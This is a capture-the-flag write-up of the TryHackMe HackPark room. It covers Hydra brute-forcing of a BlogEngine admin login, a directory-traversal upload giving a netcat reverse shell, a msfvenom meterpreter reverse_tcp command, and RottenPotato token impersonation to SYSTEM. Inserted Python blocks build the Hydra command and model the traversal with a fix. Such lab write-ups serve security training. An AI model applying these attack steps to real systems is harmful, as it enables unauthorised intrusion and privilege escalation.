TryHackMe — HackPark Writeup

Nimantha Deshappriya
5 min read · Jun 3, 2020

I have signed up for the OSCP preparation path provided by TryHackMe to sharpen my skills and knowledge in preparation for the OSCP exam. I believe that publishing a writeup after each CTF challenge will help me in many ways.

Let’s start hacking by firing up the usual Nmap scan.

Nmap revealed the following; nothing out of the ordinary came up.

Next I browsed to the website.

I used Gobuster to discover the hidden directories of the website.

Gobuster revealed a hidden directory named admin; browsing to it took me to the login page below.

It asks for a username and password to log in.

I dug deeper to check whether credentials had been saved by mistake in another hidden directory, but found nothing. I therefore decided to brute-force the login with Hydra.

I used Burp Suite to intercept the login POST request and capture the form fields that Hydra's web-form module needs: the request path, the full request body, and the text the page returns on a failed login.

I assumed the username was "admin" and used rockyou as the wordlist to crack the password.

I successfully cracked the password with Hydra, as shown below.
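The step above, turning an intercepted POST into a Hydra `http-post-form` argument, is easy to get subtly wrong (a stray colon or a dropped hidden field and every guess fails). The following is an added example, not code from the original writeup: it takes a constructed sample of an ASP.NET WebForms login request and emits the Hydra command. The path, field names and failure string are assumptions standing in for whatever Burp shows on the real target.

```python
"""Turn a captured login POST into Hydra's http-post-form argument.

Added example; not code from the writeup.  The request body below is a
constructed sample of a typical ASP.NET WebForms login form, and the path,
field names and failure string are assumptions, not values from HackPark.
"""
import shlex
from urllib.parse import unquote

# Constructed sample of the intercepted POST (not captured from the target).
SAMPLE_PATH = "/Account/login.aspx"
SAMPLE_BODY = (
    "__VIEWSTATE=%2FwEPDwUKLTYxNDE5NTIxMWRk"
    "&__EVENTVALIDATION=%2FwEdAAQxyz%3D%3D"
    "&ctl00%24MainContent%24LoginUser%24UserName=admin"
    "&ctl00%24MainContent%24LoginUser%24Password=test123"
    "&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in"
)
USER_FIELD = "ctl00$MainContent$LoginUser$UserName"  # assumed field name
PASS_FIELD = "ctl00$MainContent$LoginUser$Password"  # assumed field name
FAIL_STRING = "Login failed"                         # assumed text shown on a bad login


def hydra_post_form(path, body, user_field, pass_field, fail_string):
    """Return "<path>:<body>:<failure>" for Hydra's http-post-form module.

    The body is kept exactly as captured (so __VIEWSTATE and
    __EVENTVALIDATION survive) except that the username and password values
    are replaced by Hydra's ^USER^ and ^PASS^ placeholders.  Hydra splits
    the argument on ':', so any literal colon must be escaped as '\\:'.
    """
    parts, seen = [], set()
    for pair in body.split("&"):
        key, sep, value = pair.partition("=")
        name = unquote(key)            # field names arrive URL-encoded ($ -> %24)
        if name == user_field:
            value, seen = "^USER^", seen | {"user"}
        elif name == pass_field:
            value, seen = "^PASS^", seen | {"pass"}
        parts.append(key + sep + value)
    if seen != {"user", "pass"}:
        raise ValueError("username or password field not found in captured body")
    data = "&".join(parts).replace(":", "\\:")
    failure = fail_string.replace(":", "\\:")
    return f"{path}:{data}:{failure}"


def hydra_argv(target, user, wordlist, module_arg, https=False):
    """Full command line: one known username against a password wordlist."""
    service = "https-post-form" if https else "http-post-form"
    return ["hydra", "-l", user, "-P", wordlist, target, service, module_arg]


if __name__ == "__main__":
    arg = hydra_post_form(SAMPLE_PATH, SAMPLE_BODY, USER_FIELD, PASS_FIELD, FAIL_STRING)
    # shlex.join quotes the module argument so it can be pasted into a shell.
    print(shlex.join(hydra_argv("10.10.10.10", "admin",
                                "/usr/share/wordlists/rockyou.txt", arg)))
```

Before launching the run, send one deliberately wrong password by hand and confirm the response really contains the failure string; if the application ties `__VIEWSTATE` or `__EVENTVALIDATION` to the session, the replayed values may be rejected and every guess will be reported the same way, which shows up as either zero hits or a false "success" on the first word.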

Logged into the HackPark admin portal with the password recovered by the brute-force attack. 🙌🙌🙌

You can see the dashboard once you are logged in. By going to the "About" section, you can confirm the BlogEngine version.

BlogEngine.NET is an open-source ASP.NET blogging platform.

Moving on, my main goal was to check whether there were any public exploits for BlogEngine 3.3.6. Luckily, I found one in Exploit-DB that matched the exact version.

Reading through the exploit, I found that BlogEngine was vulnerable to a directory traversal leading to remote code execution: the theme parameter is not restricted to the themes directory, so a file uploaded through the authenticated editor can be loaded from outside it and executed, giving a reverse shell. The exploit details are on Exploit-DB.

From the post editor at the URL below, I uploaded the exploit file. As the exploit instructions state, it must have the .ascx extension.

http://10.10.10.10/admin/app/editor/editpost.cshtml

Uploaded the file.

I opened a netcat listener and visited the following URL, which triggered the reverse shell and gave me a netcat session.

http://10.10.110.35/?theme=../../App_Data/files
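The request above works because the `theme` value is spliced into a filesystem path and the `..` segments walk out of the themes directory into the uploads folder where the .ascx file landed. The following is an added example, not code from the writeup or from BlogEngine: it models that lookup in plain Python, with the naive version beside a hardened one that rejects separators and checks the canonical result stays under the allowed root. The directory layout is an assumption for illustration, and PurePosixPath is used so the example runs anywhere even though the real target is IIS on Windows.

```python
"""Why '?theme=../../App_Data/files' escapes the themes folder, and a fix.

Added example; not code from the writeup or from BlogEngine.  The paths
below are assumptions used only to illustrate the traversal.
"""
from pathlib import PurePosixPath

WEBROOT = PurePosixPath("/inetpub/wwwroot/blog")   # assumed web root
THEMES = WEBROOT / "Custom" / "Themes"             # assumed themes directory
UPLOADS = WEBROOT / "App_Data" / "files"           # assumed location of editor uploads
VIEW = "PostView.ascx"                             # name the exploit's instructions use


def normalize(path: PurePosixPath) -> PurePosixPath:
    """Collapse '.' and '..' lexically; stands in for the OS canonicalisation."""
    parts = []
    for part in path.parts:
        if part == "..":
            if len(parts) > 1:          # never pop the root itself
                parts.pop()
        elif part != ".":
            parts.append(part)
    return PurePosixPath(*parts)


def resolve_view_vulnerable(theme: str) -> PurePosixPath:
    """Naive lookup: the user-supplied theme name is used as a path fragment.

    theme='../../App_Data/files' resolves into the uploads directory, so an
    attacker-uploaded PostView.ascx is the one the engine compiles and runs.
    """
    return normalize(THEMES / theme / VIEW)


def resolve_view_hardened(theme: str) -> PurePosixPath:
    """Same lookup with input validation plus a containment check.

    Runs on the already URL-decoded value.  A theme name is a single
    directory name, so any separator or dot-segment is rejected outright;
    the containment check is defence in depth against anything the first
    check misses (odd encodings, normalisation quirks).
    """
    if not theme or "/" in theme or "\\" in theme or theme in (".", ".."):
        raise ValueError(f"invalid theme name: {theme!r}")
    candidate = normalize(THEMES / theme / VIEW)
    if THEMES not in candidate.parents:
        raise ValueError(f"theme escapes themes root: {theme!r}")
    return candidate


if __name__ == "__main__":
    print("vulnerable:", resolve_view_vulnerable("../../App_Data/files"))
    try:
        resolve_view_hardened("../../App_Data/files")
    except ValueError as exc:
        print("hardened:  ", exc)
```

A stricter fix is an allowlist of installed theme names looked up on disk; the containment check shown here is the minimum that turns the traversal into a rejected request rather than a code-execution primitive.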

The netcat shell was unstable, so I upgraded it to a Meterpreter session via Metasploit.

Generated a payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[vpnIP] LPORT=[LPORT] -f exe > shell.exe

Started a Python HTTP server to transfer the payload to the compromised machine.

Uploaded the payload to the target.

Opened msfconsole, set up a handler and executed shell.exe on the compromised machine.

I got a stable, low-privilege Meterpreter session.

The last piece of the puzzle was to escalate privileges to SYSTEM.

I first tried Metasploit's local exploit suggester, which wasn't useful.

Then I tried Windows Exploit Suggester (the Python script), which listed several candidate vulnerabilities.

I tried a few of them without success, then came across a vulnerability named MS16-075.

MS16-075 is an elevation-of-privilege vulnerability: an attacker who can log on to the system and run a specially crafted application can gain elevated privileges.

I chose RottenPotato to exploit it. RottenPotato needs the current account to hold SeImpersonatePrivilege (check with whoami /priv), which IIS and other service accounts usually have.

RottenPotato can be downloaded from its GitHub repository.

Transferred the RottenPotato.exe to the compromised machine.

Executed the file.

Listed the available tokens and found that "BUILTIN\Administrators" could be impersonated.

Holding a higher-privileged token does not by itself give you a privileged user's permissions: Windows decides what a process may do from the process's primary token, not from an impersonation token held by one of its threads.

So I impersonated the token and then migrated into a process running with the right permissions to become SYSTEM; I chose svchost.exe as the migration target. 💪💪💪💪
